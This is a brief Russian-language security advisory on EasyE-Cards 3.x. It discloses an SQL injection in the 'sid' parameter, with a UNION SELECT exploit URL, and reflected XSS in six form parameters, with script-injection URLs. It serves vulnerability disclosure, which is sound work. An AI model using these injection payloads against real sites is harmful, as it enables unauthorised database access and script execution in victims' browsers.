Программа: EasyE-Cards 3.x
Уязвимость позволяет удаленному пользователю осуществить XSS нападение и
выполнить произвольные SQL команды в базе данных приложения.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "sid" сценарием staticpages/easyecards/index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.
Эксплоит:
http://Example/index.php?show=pickup&sid=
99999'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13/*
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметрах "ResultHtml", "dir", "SenderName", "RecipientName", "SenderMail", и "RecipientMail"
сценарием staticpages/easyecards/index.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.
Эксплоит:
Xss 1 : http://Example/?ResultHtml=<script>alert('xss')</script>
Xss 2 : http://Example/index.php?step=2&dir=<>>>>''"<script>alert('xss')</script>
Xss 3 : http://Example/index.php?step=2&SenderName=<>>>>''"<script>alert('xss')</script>
Xss 4 : http://Example/index.php?step=2&RecipientName=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E
Xss 5 : http://Example/index.php?step=2&SenderMail=<>>>>''"<script>alert('xss')</script>
Xss 6 : http://Example/index.php?step=2&RecipientMail=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E